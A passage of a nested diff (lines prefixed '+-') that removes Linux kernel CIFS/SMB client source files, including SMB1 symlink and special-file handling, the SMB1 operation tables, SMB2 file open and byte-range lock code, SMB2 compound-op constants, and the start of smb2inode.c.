+-			   current->tgid, length, offset, unlock, lock,
+-			   (__u8)type, wait, 0);
+-}
+-
+-static int
+-cifs_unix_dfs_readlink(const unsigned int xid, struct cifs_tcon *tcon,
+-		       const unsigned char *searchName, char **symlinkinfo,
+-		       const struct nls_table *nls_codepage)
+-{
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	int rc;
+-	struct dfs_info3_param referral = {0};
+-
+-	rc = get_dfs_path(xid, tcon->ses, searchName, nls_codepage, &referral,
+-			  0);
+-
+-	if (!rc) {
+-		*symlinkinfo = kstrdup(referral.node_name, GFP_KERNEL);
+-		free_dfs_info_param(&referral);
+-		if (!*symlinkinfo)
+-			rc = -ENOMEM;
+-	}
+-	return rc;
+-#else /* No DFS support */
+-	return -EREMOTE;
+-#endif
+-}
+-
+-static int
+-cifs_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifs_sb_info *cifs_sb, const char *full_path,
+-		   char **target_path, bool is_reparse_point)
+-{
+-	int rc;
+-	int oplock = 0;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-
+-	cifs_dbg(FYI, "%s: path: %s\n", __func__, full_path);
+-
+-	if (is_reparse_point) {
+-		cifs_dbg(VFS, "reparse points not handled for SMB1 symlinks\n");
+-		return -EOPNOTSUPP;
+-	}
+-
+-	/* Check for unix extensions */
+-	if (cap_unix(tcon->ses)) {
+-		rc = CIFSSMBUnixQuerySymLink(xid, tcon, full_path, target_path,
+-					     cifs_sb->local_nls,
+-					     cifs_remap(cifs_sb));
+-		if (rc == -EREMOTE)
+-			rc = cifs_unix_dfs_readlink(xid, tcon, full_path,
+-						    target_path,
+-						    cifs_sb->local_nls);
+-
+-		goto out;
+-	}
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = FILE_READ_ATTRIBUTES,
+-		.create_options = cifs_create_options(cifs_sb,
+-						      OPEN_REPARSE_POINT),
+-		.disposition = FILE_OPEN,
+-		.path = full_path,
+-		.fid = &fid,
+-	};
+-
+-	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+-	if (rc)
+-		goto out;
+-
+-	rc = CIFSSMBQuerySymLink(xid, tcon, fid.netfid, target_path,
+-				 cifs_sb->local_nls);
+-	if (rc)
+-		goto out_close;
+-
+-	convert_delimiter(*target_path, '/');
+-out_close:
+-	CIFSSMBClose(xid, tcon, fid.netfid);
+-out:
+-	if (!rc)
+-		cifs_dbg(FYI, "%s: target path: %s\n", __func__, *target_path);
+-	return rc;
+-}
+-
+-static bool
+-cifs_is_read_op(__u32 oplock)
+-{
+-	return oplock == OPLOCK_READ;
+-}
+-
+-static unsigned int
+-cifs_wp_retry_size(struct inode *inode)
+-{
+-	return CIFS_SB(inode->i_sb)->ctx->wsize;
+-}
+-
+-static bool
+-cifs_dir_needs_close(struct cifsFileInfo *cfile)
+-{
+-	return !cfile->srch_inf.endOfSearch && !cfile->invalidHandle;
+-}
+-
+-static bool
+-cifs_can_echo(struct TCP_Server_Info *server)
+-{
+-	if (server->tcpStatus == CifsGood)
+-		return true;
+-
+-	return false;
+-}
+-
+-static int
+-cifs_make_node(unsigned int xid, struct inode *inode,
+-	       struct dentry *dentry, struct cifs_tcon *tcon,
+-	       const char *full_path, umode_t mode, dev_t dev)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct inode *newinode = NULL;
+-	int rc = -EPERM;
+-	struct cifs_open_info_data buf = {};
+-	struct cifs_io_parms io_parms;
+-	__u32 oplock = 0;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	unsigned int bytes_written;
+-	struct win_dev *pdev;
+-	struct kvec iov[2];
+-
+-	if (tcon->unix_ext) {
+-		/*
+-		 * SMB1 Unix Extensions: requires server support but
+-		 * works with all special files
+-		 */
+-		struct cifs_unix_set_info_args args = {
+-			.mode	= mode & ~current_umask(),
+-			.ctime	= NO_CHANGE_64,
+-			.atime	= NO_CHANGE_64,
+-			.mtime	= NO_CHANGE_64,
+-			.device	= dev,
+-		};
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
+-			args.uid = current_fsuid();
+-			args.gid = current_fsgid();
+-		} else {
+-			args.uid = INVALID_UID; /* no change */
+-			args.gid = INVALID_GID; /* no change */
+-		}
+-		rc = CIFSSMBUnixSetPathInfo(xid, tcon, full_path, &args,
+-					    cifs_sb->local_nls,
+-					    cifs_remap(cifs_sb));
+-		if (rc)
+-			return rc;
+-
+-		rc = cifs_get_inode_info_unix(&newinode, full_path,
+-					      inode->i_sb, xid);
+-
+-		if (rc == 0)
+-			d_instantiate(dentry, newinode);
+-		return rc;
+-	}
+-
+-	/*
+-	 * SMB1 SFU emulation: should work with all servers, but only
+-	 * support block and char device (no socket & fifo)
+-	 */
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL))
+-		return rc;
+-
+-	if (!S_ISCHR(mode) && !S_ISBLK(mode))
+-		return rc;
+-
+-	cifs_dbg(FYI, "sfu compat create special file\n");
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = GENERIC_WRITE,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
+-						      CREATE_OPTION_SPECIAL),
+-		.disposition = FILE_CREATE,
+-		.path = full_path,
+-		.fid = &fid,
+-	};
+-
+-	if (tcon->ses->server->oplocks)
+-		oplock = REQ_OPLOCK;
+-	else
+-		oplock = 0;
+-	rc = tcon->ses->server->ops->open(xid, &oparms, &oplock, &buf);
+-	if (rc)
+-		return rc;
+-
+-	/*
+-	 * BB Do not bother to decode buf since no local inode yet to put
+-	 * timestamps in, but we can reuse it safely.
+-	 */
+-
+-	pdev = (struct win_dev *)&buf.fi;
+-	io_parms.pid = current->tgid;
+-	io_parms.tcon = tcon;
+-	io_parms.offset = 0;
+-	io_parms.length = sizeof(struct win_dev);
+-	iov[1].iov_base = &buf.fi;
+-	iov[1].iov_len = sizeof(struct win_dev);
+-	if (S_ISCHR(mode)) {
+-		memcpy(pdev->type, "IntxCHR", 8);
+-		pdev->major = cpu_to_le64(MAJOR(dev));
+-		pdev->minor = cpu_to_le64(MINOR(dev));
+-		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
+-							&bytes_written, iov, 1);
+-	} else if (S_ISBLK(mode)) {
+-		memcpy(pdev->type, "IntxBLK", 8);
+-		pdev->major = cpu_to_le64(MAJOR(dev));
+-		pdev->minor = cpu_to_le64(MINOR(dev));
+-		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
+-							&bytes_written, iov, 1);
+-	}
+-	tcon->ses->server->ops->close(xid, tcon, &fid);
+-	d_drop(dentry);
+-
+-	/* FIXME: add code here to set EAs */
+-
+-	cifs_free_open_info(&buf);
+-	return rc;
+-}
+-
+-
+-
+-struct smb_version_operations smb1_operations = {
+-	.send_cancel = send_nt_cancel,
+-	.compare_fids = cifs_compare_fids,
+-	.setup_request = cifs_setup_request,
+-	.setup_async_request = cifs_setup_async_request,
+-	.check_receive = cifs_check_receive,
+-	.add_credits = cifs_add_credits,
+-	.set_credits = cifs_set_credits,
+-	.get_credits_field = cifs_get_credits_field,
+-	.get_credits = cifs_get_credits,
+-	.wait_mtu_credits = cifs_wait_mtu_credits,
+-	.get_next_mid = cifs_get_next_mid,
+-	.read_data_offset = cifs_read_data_offset,
+-	.read_data_length = cifs_read_data_length,
+-	.map_error = map_smb_to_linux_error,
+-	.find_mid = cifs_find_mid,
+-	.check_message = checkSMB,
+-	.dump_detail = cifs_dump_detail,
+-	.clear_stats = cifs_clear_stats,
+-	.print_stats = cifs_print_stats,
+-	.is_oplock_break = is_valid_oplock_break,
+-	.downgrade_oplock = cifs_downgrade_oplock,
+-	.check_trans2 = cifs_check_trans2,
+-	.need_neg = cifs_need_neg,
+-	.negotiate = cifs_negotiate,
+-	.negotiate_wsize = cifs_negotiate_wsize,
+-	.negotiate_rsize = cifs_negotiate_rsize,
+-	.sess_setup = CIFS_SessSetup,
+-	.logoff = CIFSSMBLogoff,
+-	.tree_connect = CIFSTCon,
+-	.tree_disconnect = CIFSSMBTDis,
+-	.get_dfs_refer = CIFSGetDFSRefer,
+-	.qfs_tcon = cifs_qfs_tcon,
+-	.is_path_accessible = cifs_is_path_accessible,
+-	.can_echo = cifs_can_echo,
+-	.query_path_info = cifs_query_path_info,
+-	.query_file_info = cifs_query_file_info,
+-	.get_srv_inum = cifs_get_srv_inum,
+-	.set_path_size = CIFSSMBSetEOF,
+-	.set_file_size = CIFSSMBSetFileSize,
+-	.set_file_info = smb_set_file_info,
+-	.set_compression = cifs_set_compression,
+-	.echo = CIFSSMBEcho,
+-	.mkdir = CIFSSMBMkDir,
+-	.mkdir_setinfo = cifs_mkdir_setinfo,
+-	.rmdir = CIFSSMBRmDir,
+-	.unlink = CIFSSMBDelFile,
+-	.rename_pending_delete = cifs_rename_pending_delete,
+-	.rename = CIFSSMBRename,
+-	.create_hardlink = CIFSCreateHardLink,
+-	.query_symlink = cifs_query_symlink,
+-	.open = cifs_open_file,
+-	.set_fid = cifs_set_fid,
+-	.close = cifs_close_file,
+-	.flush = cifs_flush_file,
+-	.async_readv = cifs_async_readv,
+-	.async_writev = cifs_async_writev,
+-	.sync_read = cifs_sync_read,
+-	.sync_write = cifs_sync_write,
+-	.query_dir_first = cifs_query_dir_first,
+-	.query_dir_next = cifs_query_dir_next,
+-	.close_dir = cifs_close_dir,
+-	.calc_smb_size = smbCalcSize,
+-	.oplock_response = cifs_oplock_response,
+-	.queryfs = cifs_queryfs,
+-	.mand_lock = cifs_mand_lock,
+-	.mand_unlock_range = cifs_unlock_range,
+-	.push_mand_locks = cifs_push_mandatory_locks,
+-	.query_mf_symlink = cifs_query_mf_symlink,
+-	.create_mf_symlink = cifs_create_mf_symlink,
+-	.is_read_op = cifs_is_read_op,
+-	.wp_retry_size = cifs_wp_retry_size,
+-	.dir_needs_close = cifs_dir_needs_close,
+-	.select_sectype = cifs_select_sectype,
+-#ifdef CONFIG_CIFS_XATTR
+-	.query_all_EAs = CIFSSMBQAllEAs,
+-	.set_EA = CIFSSMBSetEA,
+-#endif /* CIFS_XATTR */
+-	.get_acl = get_cifs_acl,
+-	.get_acl_by_fid = get_cifs_acl_by_fid,
+-	.set_acl = set_cifs_acl,
+-	.make_node = cifs_make_node,
+-};
+-
+-struct smb_version_values smb1_values = {
+-	.version_string = SMB1_VERSION_STRING,
+-	.protocol_id = SMB10_PROT_ID,
+-	.large_lock_type = LOCKING_ANDX_LARGE_FILES,
+-	.exclusive_lock_type = 0,
+-	.shared_lock_type = LOCKING_ANDX_SHARED_LOCK,
+-	.unlock_lock_type = 0,
+-	.header_preamble_size = 4,
+-	.header_size = sizeof(struct smb_hdr),
+-	.max_header_size = MAX_CIFS_HDR_SIZE,
+-	.read_rsp_size = sizeof(READ_RSP),
+-	.lock_cmd = cpu_to_le16(SMB_COM_LOCKING_ANDX),
+-	.cap_unix = CAP_UNIX,
+-	.cap_nt_find = CAP_NT_SMBS | CAP_NT_FIND,
+-	.cap_large_files = CAP_LARGE_FILES,
+-	.signing_enabled = SECMODE_SIGN_ENABLED,
+-	.signing_required = SECMODE_SIGN_REQUIRED,
+-};
+diff --git a/fs/cifs/smb2file.c b/fs/cifs/smb2file.c
+deleted file mode 100644
+index ba6cc50af390f..0000000000000
+--- a/fs/cifs/smb2file.c
++++ /dev/null
+@@ -1,371 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002, 2011
+- *   Author(s): Steve French (sfrench@us.ibm.com),
+- *              Pavel Shilovsky ((pshilovsky@samba.org) 2012
+- *
+- */
+-#include <linux/fs.h>
+-#include <linux/stat.h>
+-#include <linux/slab.h>
+-#include <linux/pagemap.h>
+-#include <asm/div64.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "cifs_unicode.h"
+-#include "fscache.h"
+-#include "smb2proto.h"
+-#include "smb2status.h"
+-
+-static struct smb2_symlink_err_rsp *symlink_data(const struct kvec *iov)
+-{
+-	struct smb2_err_rsp *err = iov->iov_base;
+-	struct smb2_symlink_err_rsp *sym = ERR_PTR(-EINVAL);
+-	u32 len;
+-
+-	if (err->ErrorContextCount) {
+-		struct smb2_error_context_rsp *p, *end;
+-
+-		len = (u32)err->ErrorContextCount * (offsetof(struct smb2_error_context_rsp,
+-							      ErrorContextData) +
+-						     sizeof(struct smb2_symlink_err_rsp));
+-		if (le32_to_cpu(err->ByteCount) < len || iov->iov_len < len + sizeof(*err))
+-			return ERR_PTR(-EINVAL);
+-
+-		p = (struct smb2_error_context_rsp *)err->ErrorData;
+-		end = (struct smb2_error_context_rsp *)((u8 *)err + iov->iov_len);
+-		do {
+-			if (le32_to_cpu(p->ErrorId) == SMB2_ERROR_ID_DEFAULT) {
+-				sym = (struct smb2_symlink_err_rsp *)&p->ErrorContextData;
+-				break;
+-			}
+-			cifs_dbg(FYI, "%s: skipping unhandled error context: 0x%x\n",
+-				 __func__, le32_to_cpu(p->ErrorId));
+-
+-			len = ALIGN(le32_to_cpu(p->ErrorDataLength), 8);
+-			p = (struct smb2_error_context_rsp *)((u8 *)&p->ErrorContextData + len);
+-		} while (p < end);
+-	} else if (le32_to_cpu(err->ByteCount) >= sizeof(*sym) &&
+-		   iov->iov_len >= SMB2_SYMLINK_STRUCT_SIZE) {
+-		sym = (struct smb2_symlink_err_rsp *)err->ErrorData;
+-	}
+-
+-	if (!IS_ERR(sym) && (le32_to_cpu(sym->SymLinkErrorTag) != SYMLINK_ERROR_TAG ||
+-			     le32_to_cpu(sym->ReparseTag) != IO_REPARSE_TAG_SYMLINK))
+-		sym = ERR_PTR(-EINVAL);
+-
+-	return sym;
+-}
+-
+-int smb2_parse_symlink_response(struct cifs_sb_info *cifs_sb, const struct kvec *iov, char **path)
+-{
+-	struct smb2_symlink_err_rsp *sym;
+-	unsigned int sub_offs, sub_len;
+-	unsigned int print_offs, print_len;
+-	char *s;
+-
+-	if (!cifs_sb || !iov || !iov->iov_base || !iov->iov_len || !path)
+-		return -EINVAL;
+-
+-	sym = symlink_data(iov);
+-	if (IS_ERR(sym))
+-		return PTR_ERR(sym);
+-
+-	sub_len = le16_to_cpu(sym->SubstituteNameLength);
+-	sub_offs = le16_to_cpu(sym->SubstituteNameOffset);
+-	print_len = le16_to_cpu(sym->PrintNameLength);
+-	print_offs = le16_to_cpu(sym->PrintNameOffset);
+-
+-	if (iov->iov_len < SMB2_SYMLINK_STRUCT_SIZE + sub_offs + sub_len ||
+-	    iov->iov_len < SMB2_SYMLINK_STRUCT_SIZE + print_offs + print_len)
+-		return -EINVAL;
+-
+-	s = cifs_strndup_from_utf16((char *)sym->PathBuffer + sub_offs, sub_len, true,
+-				    cifs_sb->local_nls);
+-	if (!s)
+-		return -ENOMEM;
+-	convert_delimiter(s, '/');
+-	cifs_dbg(FYI, "%s: symlink target: %s\n", __func__, s);
+-
+-	*path = s;
+-	return 0;
+-}
+-
+-int smb2_open_file(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock, void *buf)
+-{
+-	int rc;
+-	__le16 *smb2_path;
+-	__u8 smb2_oplock;
+-	struct cifs_open_info_data *data = buf;
+-	struct smb2_file_all_info file_info = {};
+-	struct smb2_file_all_info *smb2_data = data ? &file_info : NULL;
+-	struct kvec err_iov = {};
+-	int err_buftype = CIFS_NO_BUFFER;
+-	struct cifs_fid *fid = oparms->fid;
+-	struct network_resiliency_req nr_ioctl_req;
+-
+-	smb2_path = cifs_convert_path_to_utf16(oparms->path, oparms->cifs_sb);
+-	if (smb2_path == NULL)
+-		return -ENOMEM;
+-
+-	oparms->desired_access |= FILE_READ_ATTRIBUTES;
+-	smb2_oplock = SMB2_OPLOCK_LEVEL_BATCH;
+-
+-	rc = SMB2_open(xid, oparms, smb2_path, &smb2_oplock, smb2_data, NULL, &err_iov,
+-		       &err_buftype);
+-	if (rc && data) {
+-		struct smb2_hdr *hdr = err_iov.iov_base;
+-
+-		if (unlikely(!err_iov.iov_base || err_buftype == CIFS_NO_BUFFER))
+-			goto out;
+-		if (hdr->Status == STATUS_STOPPED_ON_SYMLINK) {
+-			rc = smb2_parse_symlink_response(oparms->cifs_sb, &err_iov,
+-							 &data->symlink_target);
+-			if (!rc) {
+-				memset(smb2_data, 0, sizeof(*smb2_data));
+-				oparms->create_options |= OPEN_REPARSE_POINT;
+-				rc = SMB2_open(xid, oparms, smb2_path, &smb2_oplock, smb2_data,
+-					       NULL, NULL, NULL);
+-				oparms->create_options &= ~OPEN_REPARSE_POINT;
+-			}
+-		}
+-	}
+-
+-	if (rc)
+-		goto out;
+-
+-	if (oparms->tcon->use_resilient) {
+-		/* default timeout is 0, servers pick default (120 seconds) */
+-		nr_ioctl_req.Timeout =
+-			cpu_to_le32(oparms->tcon->handle_timeout);
+-		nr_ioctl_req.Reserved = 0;
+-		rc = SMB2_ioctl(xid, oparms->tcon, fid->persistent_fid,
+-			fid->volatile_fid, FSCTL_LMR_REQUEST_RESILIENCY,
+-			(char *)&nr_ioctl_req, sizeof(nr_ioctl_req),
+-			CIFSMaxBufSize, NULL, NULL /* no return info */);
+-		if (rc == -EOPNOTSUPP) {
+-			cifs_dbg(VFS,
+-			     "resiliency not supported by server, disabling\n");
+-			oparms->tcon->use_resilient = false;
+-		} else if (rc)
+-			cifs_dbg(FYI, "error %d setting resiliency\n", rc);
+-
+-		rc = 0;
+-	}
+-
+-	if (smb2_data) {
+-		/* if open response does not have IndexNumber field - get it */
+-		if (smb2_data->IndexNumber == 0) {
+-			rc = SMB2_get_srv_num(xid, oparms->tcon,
+-				      fid->persistent_fid,
+-				      fid->volatile_fid,
+-				      &smb2_data->IndexNumber);
+-			if (rc) {
+-				/*
+-				 * let get_inode_info disable server inode
+-				 * numbers
+-				 */
+-				smb2_data->IndexNumber = 0;
+-				rc = 0;
+-			}
+-		}
+-		memcpy(&data->fi, smb2_data, sizeof(data->fi));
+-	}
+-
+-	*oplock = smb2_oplock;
+-out:
+-	free_rsp_buf(err_buftype, err_iov.iov_base);
+-	kfree(smb2_path);
+-	return rc;
+-}
+-
+-int
+-smb2_unlock_range(struct cifsFileInfo *cfile, struct file_lock *flock,
+-		  const unsigned int xid)
+-{
+-	int rc = 0, stored_rc;
+-	unsigned int max_num, num = 0, max_buf;
+-	struct smb2_lock_element *buf, *cur;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	struct cifsLockInfo *li, *tmp;
+-	__u64 length = 1 + flock->fl_end - flock->fl_start;
+-	struct list_head tmp_llist;
+-
+-	INIT_LIST_HEAD(&tmp_llist);
+-
+-	/*
+-	 * Accessing maxBuf is racy with cifs_reconnect - need to store value
+-	 * and check it before using.
+-	 */
+-	max_buf = tcon->ses->server->maxBuf;
+-	if (max_buf < sizeof(struct smb2_lock_element))
+-		return -EINVAL;
+-
+-	BUILD_BUG_ON(sizeof(struct smb2_lock_element) > PAGE_SIZE);
+-	max_buf = min_t(unsigned int, max_buf, PAGE_SIZE);
+-	max_num = max_buf / sizeof(struct smb2_lock_element);
+-	buf = kcalloc(max_num, sizeof(struct smb2_lock_element), GFP_KERNEL);
+-	if (!buf)
+-		return -ENOMEM;
+-
+-	cur = buf;
+-
+-	cifs_down_write(&cinode->lock_sem);
+-	list_for_each_entry_safe(li, tmp, &cfile->llist->locks, llist) {
+-		if (flock->fl_start > li->offset ||
+-		    (flock->fl_start + length) <
+-		    (li->offset + li->length))
+-			continue;
+-		if (current->tgid != li->pid)
+-			/*
+-			 * flock and OFD lock are associated with an open
+-			 * file description, not the process.
+-			 */
+-			if (!(flock->fl_flags & (FL_FLOCK | FL_OFDLCK)))
+-				continue;
+-		if (cinode->can_cache_brlcks) {
+-			/*
+-			 * We can cache brlock requests - simply remove a lock
+-			 * from the file's list.
+-			 */
+-			list_del(&li->llist);
+-			cifs_del_lock_waiters(li);
+-			kfree(li);
+-			continue;
+-		}
+-		cur->Length = cpu_to_le64(li->length);
+-		cur->Offset = cpu_to_le64(li->offset);
+-		cur->Flags = cpu_to_le32(SMB2_LOCKFLAG_UNLOCK);
+-		/*
+-		 * We need to save a lock here to let us add it again to the
+-		 * file's list if the unlock range request fails on the server.
+-		 */
+-		list_move(&li->llist, &tmp_llist);
+-		if (++num == max_num) {
+-			stored_rc = smb2_lockv(xid, tcon,
+-					       cfile->fid.persistent_fid,
+-					       cfile->fid.volatile_fid,
+-					       current->tgid, num, buf);
+-			if (stored_rc) {
+-				/*
+-				 * We failed on the unlock range request - add
+-				 * all locks from the tmp list to the head of
+-				 * the file's list.
+-				 */
+-				cifs_move_llist(&tmp_llist,
+-						&cfile->llist->locks);
+-				rc = stored_rc;
+-			} else
+-				/*
+-				 * The unlock range request succeed - free the
+-				 * tmp list.
+-				 */
+-				cifs_free_llist(&tmp_llist);
+-			cur = buf;
+-			num = 0;
+-		} else
+-			cur++;
+-	}
+-	if (num) {
+-		stored_rc = smb2_lockv(xid, tcon, cfile->fid.persistent_fid,
+-				       cfile->fid.volatile_fid, current->tgid,
+-				       num, buf);
+-		if (stored_rc) {
+-			cifs_move_llist(&tmp_llist, &cfile->llist->locks);
+-			rc = stored_rc;
+-		} else
+-			cifs_free_llist(&tmp_llist);
+-	}
+-	up_write(&cinode->lock_sem);
+-
+-	kfree(buf);
+-	return rc;
+-}
+-
+-static int
+-smb2_push_mand_fdlocks(struct cifs_fid_locks *fdlocks, const unsigned int xid,
+-		       struct smb2_lock_element *buf, unsigned int max_num)
+-{
+-	int rc = 0, stored_rc;
+-	struct cifsFileInfo *cfile = fdlocks->cfile;
+-	struct cifsLockInfo *li;
+-	unsigned int num = 0;
+-	struct smb2_lock_element *cur = buf;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-
+-	list_for_each_entry(li, &fdlocks->locks, llist) {
+-		cur->Length = cpu_to_le64(li->length);
+-		cur->Offset = cpu_to_le64(li->offset);
+-		cur->Flags = cpu_to_le32(li->type |
+-						SMB2_LOCKFLAG_FAIL_IMMEDIATELY);
+-		if (++num == max_num) {
+-			stored_rc = smb2_lockv(xid, tcon,
+-					       cfile->fid.persistent_fid,
+-					       cfile->fid.volatile_fid,
+-					       current->tgid, num, buf);
+-			if (stored_rc)
+-				rc = stored_rc;
+-			cur = buf;
+-			num = 0;
+-		} else
+-			cur++;
+-	}
+-	if (num) {
+-		stored_rc = smb2_lockv(xid, tcon,
+-				       cfile->fid.persistent_fid,
+-				       cfile->fid.volatile_fid,
+-				       current->tgid, num, buf);
+-		if (stored_rc)
+-			rc = stored_rc;
+-	}
+-
+-	return rc;
+-}
+-
+-int
+-smb2_push_mandatory_locks(struct cifsFileInfo *cfile)
+-{
+-	int rc = 0, stored_rc;
+-	unsigned int xid;
+-	unsigned int max_num, max_buf;
+-	struct smb2_lock_element *buf;
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	struct cifs_fid_locks *fdlocks;
+-
+-	xid = get_xid();
+-
+-	/*
+-	 * Accessing maxBuf is racy with cifs_reconnect - need to store value
+-	 * and check it for zero before using.
+-	 */
+-	max_buf = tlink_tcon(cfile->tlink)->ses->server->maxBuf;
+-	if (max_buf < sizeof(struct smb2_lock_element)) {
+-		free_xid(xid);
+-		return -EINVAL;
+-	}
+-
+-	BUILD_BUG_ON(sizeof(struct smb2_lock_element) > PAGE_SIZE);
+-	max_buf = min_t(unsigned int, max_buf, PAGE_SIZE);
+-	max_num = max_buf / sizeof(struct smb2_lock_element);
+-	buf = kcalloc(max_num, sizeof(struct smb2_lock_element), GFP_KERNEL);
+-	if (!buf) {
+-		free_xid(xid);
+-		return -ENOMEM;
+-	}
+-
+-	list_for_each_entry(fdlocks, &cinode->llist, llist) {
+-		stored_rc = smb2_push_mand_fdlocks(fdlocks, xid, buf, max_num);
+-		if (stored_rc)
+-			rc = stored_rc;
+-	}
+-
+-	kfree(buf);
+-	free_xid(xid);
+-	return rc;
+-}
+diff --git a/fs/cifs/smb2glob.h b/fs/cifs/smb2glob.h
+deleted file mode 100644
+index 82e916ad167c0..0000000000000
+--- a/fs/cifs/smb2glob.h
++++ /dev/null
+@@ -1,44 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Definitions for various global variables and structures
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002, 2011
+- *                 Etersoft, 2012
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *              Jeremy Allison (jra@samba.org)
+- *              Pavel Shilovsky (pshilovsky@samba.org) 2012
+- *
+- */
+-#ifndef _SMB2_GLOB_H
+-#define _SMB2_GLOB_H
+-
+-/*
+- *****************************************************************
+- * Constants go here
+- *****************************************************************
+- */
+-
+-/*
+- * Identifiers for functions that use the open, operation, close pattern
+- * in smb2inode.c:smb2_compound_op()
+- */
+-#define SMB2_OP_SET_DELETE 1
+-#define SMB2_OP_SET_INFO 2
+-#define SMB2_OP_QUERY_INFO 3
+-#define SMB2_OP_QUERY_DIR 4
+-#define SMB2_OP_MKDIR 5
+-#define SMB2_OP_RENAME 6
+-#define SMB2_OP_DELETE 7
+-#define SMB2_OP_HARDLINK 8
+-#define SMB2_OP_SET_EOF 9
+-#define SMB2_OP_RMDIR 10
+-#define SMB2_OP_POSIX_QUERY_INFO 11
+-
+-/* Used when constructing chained read requests. */
+-#define CHAINED_REQUEST 1
+-#define START_OF_CHAIN 2
+-#define END_OF_CHAIN 4
+-#define RELATED_REQUEST 8
+-
+-#endif	/* _SMB2_GLOB_H */
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+deleted file mode 100644
+index c97e049e29dd3..0000000000000
+--- a/fs/cifs/smb2inode.c
++++ /dev/null
+@@ -1,799 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002, 2011
+- *                 Etersoft, 2012
+- *   Author(s): Pavel Shilovsky (pshilovsky@samba.org),
+- *              Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#include <linux/fs.h>
+-#include <linux/stat.h>
+-#include <linux/slab.h>
+-#include <linux/pagemap.h>
+-#include <asm/div64.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "cifs_unicode.h"
+-#include "fscache.h"
+-#include "smb2glob.h"
+-#include "smb2pdu.h"
+-#include "smb2proto.h"
+-#include "cached_dir.h"
+-#include "smb2status.h"
+-
+-static void
+-free_set_inf_compound(struct smb_rqst *rqst)
+-{
+-	if (rqst[1].rq_iov)
+-		SMB2_set_info_free(&rqst[1]);
+-	if (rqst[2].rq_iov)
+-		SMB2_close_free(&rqst[2]);
+-}
+-
+-
+-struct cop_vars {
+-	struct cifs_open_parms oparms;
+-	struct kvec rsp_iov[3];
+-	struct smb_rqst rqst[3];
+-	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
+-	struct kvec qi_iov[1];
+-	struct kvec si_iov[SMB2_SET_INFO_IOV_SIZE];
+-	struct kvec close_iov[1];
+-	struct smb2_file_rename_info rename_info;
+-	struct smb2_file_link_info link_info;
+-};
+-
+-/*
+- * note: If cfile is passed, the reference to it is dropped here.
+- * So make sure that you do not reuse cfile after return from this func.
+- *
+- * If passing @err_iov and @err_buftype, ensure to make them both large enough (>= 3) to hold all
+- * error responses.  Caller is also responsible for freeing them up.
+- */
+-static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+-			    struct cifs_sb_info *cifs_sb, const char *full_path,
+-			    __u32 desired_access, __u32 create_disposition, __u32 create_options,
+-			    umode_t mode, void *ptr, int command, struct cifsFileInfo *cfile,
+-			    struct kvec *err_iov, int *err_buftype)
+-{
+-	struct cop_vars *vars = NULL;
+-	struct kvec *rsp_iov;
+-	struct smb_rqst *rqst;
+-	int rc;
+-	__le16 *utf16_path = NULL;
+-	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_fid fid;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server;
+-	int num_rqst = 0;
+-	int resp_buftype[3];
+-	struct smb2_query_info_rsp *qi_rsp = NULL;
+-	struct cifs_open_info_data *idata;
+-	int flags = 0;
+-	__u8 delete_pending[8] = {1, 0, 0, 0, 0, 0, 0, 0};
+-	unsigned int size[2];
+-	void *data[2];
+-	int len;
+-
+-	vars = kzalloc(sizeof(*vars), GFP_ATOMIC);
+-	if (vars == NULL)
+-		return -ENOMEM;
+-	rqst = &vars->rqst[0];
+-	rsp_iov = &vars->rsp_iov[0];
+-
+-	server = cifs_pick_channel(ses);
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
+-
+-	/* We already have a handle so we can skip the open */
+-	if (cfile)
+-		goto after_open;
+-
+-	/* Open */
+-	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
+-	if (!utf16_path) {
+-		rc = -ENOMEM;
+-		goto finished;
+-	}
+-
+-	vars->oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = full_path,
+-		.desired_access = desired_access,
+-		.disposition = create_disposition,
